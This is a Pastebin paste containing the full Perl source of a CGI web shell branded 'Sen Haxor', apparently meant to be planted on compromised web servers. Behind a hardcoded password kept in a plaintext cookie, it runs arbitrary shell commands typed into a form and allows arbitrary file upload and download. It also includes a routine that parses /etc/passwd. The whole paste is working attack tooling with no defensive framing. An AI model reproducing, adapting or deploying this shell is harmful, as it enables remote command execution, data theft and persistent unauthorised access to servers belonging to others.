API tools faq
paste
Advertisement
Pisher

CGI SHELL

Pisher
Nov 6th, 2015
574
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 17.84 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  4. $CommandTimeoutDuration = 300;
  5. $ShowDynamicOutput = 1;
  6. $password = "libero";
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27.  
  28. # handle file upload data
  29. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  30. {
  31. $Boundary = '--'.$1; # please refer to RFC1867
  32. @list = split(/$Boundary/, $in);
  33. $HeaderBody = $list[1];
  34. $HeaderBody =~ /\r\n\r\n|\n\n/;
  35. $Header = $`;
  36. $Body = $';
  37. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  38. $in{'filedata'} = $Body;
  39. $Header =~ /filename=\"(.+)\"/;
  40. $in{'f'} = $1;
  41. $in{'f'} =~ s/\"//g;
  42. $in{'f'} =~ s/\s//g;
  43.  
  44. # parse trailer
  45. for($i=2; $list[$i]; $i++)
  46. {
  47. $list[$i] =~ s/^.+name=$//;
  48. $list[$i] =~ /\"(\w+)\"/;
  49. $key = $1;
  50. $val = $';
  51. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  52. $val =~ s/%(..)/pack("c", hex($1))/ge;
  53. $in{$key} = $val;
  54. }
  55. }
  56. else # standard post data (url encoded, not multipart)
  57. {
  58. @in = split(/&/, $in);
  59. foreach $i (0 .. $#in)
  60. {
  61. $in[$i] =~ s/\+/ /g;
  62. ($key, $val) = split(/=/, $in[$i], 2);
  63. $key =~ s/%(..)/pack("c", hex($1))/ge;
  64. $val =~ s/%(..)/pack("c", hex($1))/ge;
  65. $in{$key} .= "\0" if (defined($in{$key}));
  66. $in{$key} .= $val;
  67. }
  68. }
  69. }
  70.  
  71. #------------------------------------------------------------------------------
  72. # Prints the HTML Page Header
  73. # Argument 1: Form item name to which focus should be set
  74. #------------------------------------------------------------------------------
  75. sub foo
  76. {
  77. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  78.  
  79. my %HoH = ();
  80.  
  81. my $file = '/etc/passwd';
  82. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  83.  
  84. while( <PASSWD> ) {
  85. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  86.  
  87. $HoH{ $login }{ 'uid' } = $uid;
  88. $HoH{ $login }{ 'gid' } = $gid;
  89. $HoH{ $login }{ 'dir' } = $dir;
  90. }
  91.  
  92. close PASSWD;
  93.  
  94. return \%HoH;
  95. }
  96. sub PrintPageHeader
  97. {
  98. $EncodedCurrentDir = $CurrentDir;
  99. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  100. print "Content-type: text/html\n\n";
  101. print <<END;
  102. <html>
  103. <head>
  104. <title>Sen Haxor ~ CGI Shell</title>
  105. $HtmlMetaHeader
  106. </head>
  107. <body style='color: #000000;background:url(http://i48.tinypic.com/29fcoec.png) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  108. <td colspan="2" bgcolor="black"><p align="center">s<font face="Verdana" size="2">
  109. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  110. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  111. <a href="$ScriptLocation?a=logout">Disconnect</a>
  112. <table border="0" width="100%" cellspacing="0" cellpadding="2">
  113. <p align="center"><font face="Verdana" size="3" color="#FF0000">root~Sen Haxor - Server:: <font color="gray">$ServerName</font></font>
  114. </tr>
  115. <tr>
  116. </font></td>
  117. </tr>
  118. </table>
  119. <font color="#C0C0C0" size="3">
  120. END
  121. }
  122.  
  123. #------------------------------------------------------------------------------
  124. # Prints the Login Screen
  125. #------------------------------------------------------------------------------
  126. sub PrintLoginScreen
  127. {
  128. $Message = q$<pre><font color="red">
  129. -- Enter Password --
  130. </font></pre>
  131. $;
  132. #'
  133. print <<END;
  134. $Message
  135. END
  136. }
  137.  
  138. #------------------------------------------------------------------------------
  139. # Prints the message that informs the user of a failed login
  140. #------------------------------------------------------------------------------
  141. sub PrintLoginFailedMessage
  142. {
  143. print <<END;
  144. <code>
  145. <br>login: admin<br>
  146. password:<br>
  147. Login incorrect<br><br>
  148. </code>
  149. END
  150. }
  151.  
  152. #------------------------------------------------------------------------------
  153. # Prints the HTML form for logging in
  154. #------------------------------------------------------------------------------
  155. sub PrintLoginForm
  156. {
  157. print <<END;
  158. <code>
  159. <form name="f" method="POST" action="$ScriptLocation">
  160. <input type="hidden" name="a" value="login"><font color="red">Password : </font><input type="password" name="p">
  161. <input type="submit" value="Enter">
  162. </form>
  163. </code>
  164. END
  165. }
  166.  
  167. #------------------------------------------------------------------------------
  168. # Prints the footer for the HTML Page
  169. #------------------------------------------------------------------------------
  170. sub PrintPageFooter
  171. {
  172. print "</font></body></html>";
  173. }
  174.  
  175. #------------------------------------------------------------------------------
  176. # Retreives the values of all cookies. The cookies can be accesses using the
  177. # variable $Cookies{''}
  178. #------------------------------------------------------------------------------
  179. sub GetCookies
  180. {
  181. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  182. foreach $cookie(@httpcookies)
  183. {
  184. ($id, $val) = split(/=/, $cookie);
  185. $Cookies{$id} = $val;
  186. }
  187. }
  188.  
  189. #------------------------------------------------------------------------------
  190. # Prints the screen when the user logs out
  191. #------------------------------------------------------------------------------
  192. sub PrintLogoutScreen
  193. {
  194. print "<code>Connection closed by foreign host.<br><br></code>";
  195. }
  196.  
  197. #------------------------------------------------------------------------------
  198. # Logs out the user and allows the user to login again
  199. #------------------------------------------------------------------------------
  200. sub PerformLogout
  201. {
  202. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  203. &PrintPageHeader("p");
  204. &PrintLogoutScreen;
  205. &PrintLoginScreen;
  206. &PrintLoginForm;
  207. &PrintPageFooter;
  208. }
  209.  
  210. #------------------------------------------------------------------------------
  211. # This function is called to login the user. If the password matches, it
  212. # displays a page that allows the user to run commands. If the password doens't
  213. # match or if no password is entered, it displays a form that allows the user
  214. # to login
  215. #------------------------------------------------------------------------------
  216. sub PerformLogin
  217. {
  218. if($LoginPassword eq $password) # password matched
  219. {
  220. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  221. &PrintPageHeader("c");
  222. &PrintCommandLineInputForm;
  223. &PrintPageFooter;
  224. }
  225. else # password didn't match
  226. {
  227. &PrintPageHeader("p");
  228. &PrintLoginScreen;
  229. if($LoginPassword ne "") # some password was entered
  230. {
  231. &PrintLoginFailedMessage;
  232. }
  233. &PrintLoginForm;
  234. &PrintPageFooter;
  235. }
  236. }
  237.  
  238. #------------------------------------------------------------------------------
  239. # Prints the HTML form that allows the user to enter commands
  240. #------------------------------------------------------------------------------
  241. sub PrintCommandLineInputForm
  242. {
  243. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  244. print <<END;
  245. <code>
  246. <form name="f" method="POST" action="$ScriptLocation">
  247. <input type="hidden" name="a" value="command">
  248. <input type="hidden" name="d" value="$CurrentDir">
  249. <font color="red">$Prompt</font>
  250. <input type="text" name="c" size="25">
  251. <input type="submit" value="Enter">
  252. </form>
  253. </code>
  254.  
  255. END
  256. }
  257.  
  258. #------------------------------------------------------------------------------
  259. # Prints the HTML form that allows the user to download files
  260. #------------------------------------------------------------------------------
  261. sub PrintFileDownloadForm
  262. {
  263. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  264. print <<END;
  265. <code>
  266. <form name="f" method="POST" action="$ScriptLocation">
  267. <input type="hidden" name="d" value="$CurrentDir">
  268. <input type="hidden" name="a" value="download">
  269. $Prompt download<br><br>
  270. Filename: <input type="text" name="f" size="35"><br><br>
  271. Download: <input type="submit" value="Begin">
  272. </form>
  273. </code>
  274. END
  275. }
  276.  
  277. #------------------------------------------------------------------------------
  278. # Prints the HTML form that allows the user to upload files
  279. #------------------------------------------------------------------------------
  280. sub PrintFileUploadForm
  281. {
  282. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  283. print <<END;
  284. <code>
  285. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  286. $Prompt upload<br><br>
  287. Filename: <input type="file" name="f" size="35"><br><br>
  288. Options: <input type="checkbox" name="o" value="overwrite">
  289. Overwrite if it Exists<br><br>
  290. Upload: <input type="submit" value="Begin">
  291. <input type="hidden" name="d" value="$CurrentDir">
  292. <input type="hidden" name="a" value="upload">
  293. </form>
  294. </code>
  295. END
  296. }
  297.  
  298. #------------------------------------------------------------------------------
  299. # This function is called when the timeout for a command expires. We need to
  300. # terminate the script immediately. This function is valid only on Unix. It is
  301. # never called when the script is running on NT.
  302. #------------------------------------------------------------------------------
  303. sub CommandTimeout
  304. {
  305. if(!$WinNT)
  306. {
  307. alarm(0);
  308. print <<END;
  309. </xmp>
  310. <code>
  311. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  312. <br>Killed it!
  313. <code>
  314. END
  315. &PrintCommandLineInputForm;
  316. &PrintPageFooter;
  317. exit;
  318. }
  319. }
  320.  
  321. #------------------------------------------------------------------------------
  322. # This function is called to execute commands. It displays the output of the
  323. # command and allows the user to enter another command. The change directory
  324. # command is handled differently. In this case, the new directory is stored in
  325. # an internal variable and is used each time a command has to be executed. The
  326. # output of the change directory command is not displayed to the users
  327. # therefore error messages cannot be displayed.
  328. #------------------------------------------------------------------------------
  329. sub ExecuteCommand
  330. {
  331. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  332. {
  333. # we change the directory internally. The output of the
  334. # command is not displayed.
  335.  
  336. $OldDir = $CurrentDir;
  337. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  338. chop($CurrentDir = `$Command`);
  339. &PrintPageHeader("c");
  340. &PrintCommandLineInputForm;
  341. print "<div style='float: center; text-align: left;'>";
  342. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  343. print "<code>$Prompt $RunCommand</code>";
  344. }
  345. else # some other command, display the output
  346. {
  347. &PrintPageHeader("c");
  348. &PrintCommandLineInputForm;
  349. print "<div style='float: center; text-align: left;'>";
  350. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  351. print "<code>$Prompt $RunCommand</code><xmp style='color: #00FF00;'>";
  352. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  353. if(!$WinNT)
  354. {
  355. $SIG{'ALRM'} = \&CommandTimeout;
  356. alarm($CommandTimeoutDuration);
  357. }
  358. if($ShowDynamicOutput) # show output as it is generated
  359. {
  360. $|=1;
  361. $Command .= " |";
  362. open(CommandOutput, $Command);
  363. while(<CommandOutput>)
  364. {
  365. $_ =~ s/(\n|\r\n)$//;
  366. print "$_\n";
  367. }
  368. $|=0;
  369. }
  370. else # show output after command completes
  371. {
  372. print `$Command`;
  373. }
  374. if(!$WinNT)
  375. {
  376. alarm(0);
  377. }
  378. print "</xmp>";
  379. }
  380. print "</div>";
  381. &PrintPageFooter;
  382. }
  383.  
  384. #------------------------------------------------------------------------------
  385. # This function displays the page that contains a link which allows the user
  386. # to download the specified file. The page also contains a auto-refresh
  387. # feature that starts the download automatically.
  388. # Argument 1: Fully qualified filename of the file to be downloaded
  389. #------------------------------------------------------------------------------
  390. sub PrintDownloadLinkPage
  391. {
  392. local($FileUrl) = @_;
  393. if(-e $FileUrl) # if the file exists
  394. {
  395. # encode the file link so we can send it to the browser
  396. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  397. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  398. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  399. &PrintPageHeader("c");
  400. print <<END;
  401. <code>
  402. Sending File $TransferFile...<br>
  403. If the download does not start automatically,
  404. <a href="$DownloadLink">Click Here</a>.
  405. </code>
  406. END
  407. &PrintCommandLineInputForm;
  408. &PrintPageFooter;
  409. }
  410. else # file doesn't exist
  411. {
  412. &PrintPageHeader("f");
  413. print "<code>Failed to download $FileUrl: $!</code>";
  414. &PrintFileDownloadForm;
  415. &PrintPageFooter;
  416. }
  417. }
  418.  
  419. #------------------------------------------------------------------------------
  420. # This function reads the specified file from the disk and sends it to the
  421. # browser, so that it can be downloaded by the user.
  422. # Argument 1: Fully qualified pathname of the file to be sent.
  423. #------------------------------------------------------------------------------
  424. sub SendFileToBrowser
  425. {
  426. local($SendFile) = @_;
  427. if(open(SENDFILE, $SendFile)) # file opened for reading
  428. {
  429. if($WinNT)
  430. {
  431. binmode(SENDFILE);
  432. binmode(STDOUT);
  433. }
  434. $FileSize = (stat($SendFile))[7];
  435. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  436. print "Content-Type: application/x-unknown\n";
  437. print "Content-Length: $FileSize\n";
  438. print "Content-Disposition: attachment; filename=$1\n\n";
  439. print while(<SENDFILE>);
  440. close(SENDFILE);
  441. }
  442. else # failed to open file
  443. {
  444. &PrintPageHeader("f");
  445. print "<code>Failed to download $SendFile: $!</code>";
  446. &PrintFileDownloadForm;
  447. &PrintPageFooter;
  448. }
  449. }
  450.  
  451.  
  452. #------------------------------------------------------------------------------
  453. # This function is called when the user downloads a file. It displays a message
  454. # to the user and provides a link through which the file can be downloaded.
  455. # This function is also called when the user clicks on that link. In this case,
  456. # the file is read and sent to the browser.
  457. #------------------------------------------------------------------------------
  458. sub BeginDownload
  459. {
  460. # get fully qualified path of the file to be downloaded
  461. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  462. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  463. {
  464. $TargetFile = $TransferFile;
  465. }
  466. else # path is relative
  467. {
  468. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  469. $TargetFile .= $PathSep.$TransferFile;
  470. }
  471.  
  472. if($Options eq "go") # we have to send the file
  473. {
  474. &SendFileToBrowser($TargetFile);
  475. }
  476. else # we have to send only the link page
  477. {
  478. &PrintDownloadLinkPage($TargetFile);
  479. }
  480. }
  481.  
  482. #------------------------------------------------------------------------------
  483. # This function is called when the user wants to upload a file. If the
  484. # file is not specified, it displays a form allowing the user to specify a
  485. # file, otherwise it starts the upload process.
  486. #------------------------------------------------------------------------------
  487. sub UploadFile
  488. {
  489. # if no file is specified, print the upload form again
  490. if($TransferFile eq "")
  491. {
  492. &PrintPageHeader("f");
  493. &PrintFileUploadForm;
  494. &PrintPageFooter;
  495. return;
  496. }
  497. &PrintPageHeader("c");
  498.  
  499. # start the uploading process
  500. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  501.  
  502. # get the fullly qualified pathname of the file to be created
  503. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  504. $TransferFile =~ m!([^/^\\]*)$!;
  505. $TargetName .= $PathSep.$1;
  506.  
  507. $TargetFileSize = length($in{'filedata'});
  508. # if the file exists and we are not supposed to overwrite it
  509. if(-e $TargetName && $Options ne "overwrite")
  510. {
  511. print "Failed: Destination file already exists.<br>";
  512. }
  513. else # file is not present
  514. {
  515. if(open(UPLOADFILE, ">$TargetName"))
  516. {
  517. binmode(UPLOADFILE) if $WinNT;
  518. print UPLOADFILE $in{'filedata'};
  519. close(UPLOADFILE);
  520. print "Transfered $TargetFileSize Bytes.<br>";
  521. print "File Path: $TargetName<br>";
  522. }
  523. else
  524. {
  525. print "Failed: $!<br>";
  526. }
  527. }
  528. print "</code>";
  529. &PrintCommandLineInputForm;
  530. &PrintPageFooter;
  531. }
  532.  
  533. #------------------------------------------------------------------------------
  534. # This function is called when the user wants to download a file. If the
  535. # filename is not specified, it displays a form allowing the user to specify a
  536. # file, otherwise it displays a message to the user and provides a link
  537. # through which the file can be downloaded.
  538. #------------------------------------------------------------------------------
  539. sub DownloadFile
  540. {
  541. # if no file is specified, print the download form again
  542. if($TransferFile eq "")
  543. {
  544. &PrintPageHeader("f");
  545. &PrintFileDownloadForm;
  546. &PrintPageFooter;
  547. return;
  548. }
  549.  
  550. # get fully qualified path of the file to be downloaded
  551. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  552. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  553. {
  554. $TargetFile = $TransferFile;
  555. }
  556. else # path is relative
  557. {
  558. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  559. $TargetFile .= $PathSep.$TransferFile;
  560. }
  561.  
  562. if($Options eq "go") # we have to send the file
  563. {
  564. &SendFileToBrowser($TargetFile);
  565. }
  566. else # we have to send only the link page
  567. {
  568. &PrintDownloadLinkPage($TargetFile);
  569. }
  570. }
  571.  
  572. #------------------------------------------------------------------------------
  573. # Main Program - Execution Starts Here
  574. #------------------------------------------------------------------------------
  575. &ReadParse;
  576. &GetCookies;
  577.  
  578. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  579. $ServerName = $ENV{'SERVER_NAME'};
  580. $LoginPassword = $in{'p'};
  581. $RunCommand = $in{'c'};
  582. $TransferFile = $in{'f'};
  583. $Options = $in{'o'};
  584.  
  585. $Action = $in{'a'};
  586. $Action = "login" if($Action eq ""); # no action specified, use default
  587.  
  588. # get the directory in which the commands will be executed
  589. $CurrentDir = $in{'d'};
  590. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  591.  
  592. $LoggedIn = $Cookies{'SAVEDPWD'} eq $password;
  593.  
  594. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  595. {
  596. &PerformLogin;
  597. }
  598. elsif($Action eq "command") # user wants to run a command
  599. {
  600. &ExecuteCommand;
  601. }
  602. elsif($Action eq "upload") # user wants to upload a file
  603. {
  604. &UploadFile;
  605. }
  606. elsif($Action eq "download") # user wants to download a file
  607. {
  608. &DownloadFile;
  609. }
  610. elsif($Action eq "logout") # user wants to logout
  611. {
  612. &PerformLogout;
  613. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!